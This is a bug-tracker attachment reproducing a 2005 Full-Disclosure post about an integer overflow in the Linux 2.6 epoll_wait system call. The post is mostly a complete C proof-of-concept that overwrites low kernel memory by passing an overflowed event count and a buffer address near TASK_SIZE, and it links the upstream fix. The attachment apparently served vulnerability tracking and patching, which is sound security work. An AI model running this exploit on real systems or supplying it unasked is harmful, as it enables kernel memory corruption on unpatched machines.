Attachment 31060 Details for Bug 71782

exploit posted on full-disclosure

epoll.mail (text/plain), 2.01 KB, created by Ludwig Nussel on 2005-03-09 11:49:04 UTC

(hide)

Description:

Filename:

MIME Type:

Creator: Ludwig Nussel

Created: 2005-03-09 11:49:04 UTC

Size: 2.01 KB

patch

obsolete

>it is possible to partially overwrite low kernel ( >= 2.6 <= 2.6.11) memory 
>due to integer overflow in sys_epoll_wait and misuse of __put_user 
>in ep_send_events
>
>tested on i386.
>despite the overflow, the os seemingly continues normal operation.
>
>fix:
>http://linux.bkbits.net:8080/linux-2.6/cset@422dd06a1p5PsyFhoGAJseinjEq3ew?nav=index.html|ChangeSet@-1d
>
>-------------------------------------------------
>/*
> * copyright georgi guninski.
> * cannot be used in vulnerabilities databases like securityfocus and mitre
> * */
>#include <stdio.h>
>#include <sys/epoll.h>
>#include <sys/socket.h>
>#include <sys/socket.h>
>#include <netinet/in.h>
>#include <arpa/inet.h>
>#include <unistd.h>
>#include <stdlib.h>
>#define __KERNEL__
>#include <asm/processor.h>
>#undef __KERNEL__
>
>#define MAXV 500
>
>int main(int argc,char ** argv)
>{
>int epfd;
>int i;
>int res;
>struct epoll_event ev;
>int *fds;
>int over;
>void *km;
>
>over= ((unsigned int)-1)/sizeof(struct epoll_event)+1;
>km=(void *)(TASK_SIZE - over*sizeof(struct epoll_event) - 4);
>printf("sizeof=%d %x %lx\n",sizeof(struct epoll_event),over,(unsigned long)km);
>
>        epfd = epoll_create(MAXV);
>        printf("Epoll descriptor %i\n",epfd);
>	fds=calloc(2*MAXV,sizeof(int));
>for(i=0;i<MAXV;i++)
>{	
>	if (socketpair(AF_UNIX, SOCK_STREAM, 0, &fds[2*i])) perror("pair");
>        ev.data.u32 = 0x42424242;
>        ev.events = EPOLLOUT|EPOLLIN | 0x42424242;
>        res = epoll_ctl(epfd,EPOLL_CTL_ADD,fds[2*i],&ev);
>}	
>for(i=0;i<MAXV;i++) write(fds[2*i+1],&i,sizeof(i));
>
>system("sync");
>
>        for(i = 0; i < 1; i++)
>        {
>                res = epoll_wait(epfd,km,over,-1);
>                printf("epoll_wait returned %i\n",res);
>       		printf("check what is after TASK_SIZE\n"); 
>        }
>
>        close(epfd);
>	return 42;
>}
>----------------------------------------- 
>
>-- 
>where do you want bill gates to go today?
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://www.secunia.com/

Actions: View

Attachments on bug 71782: 31057 | 31060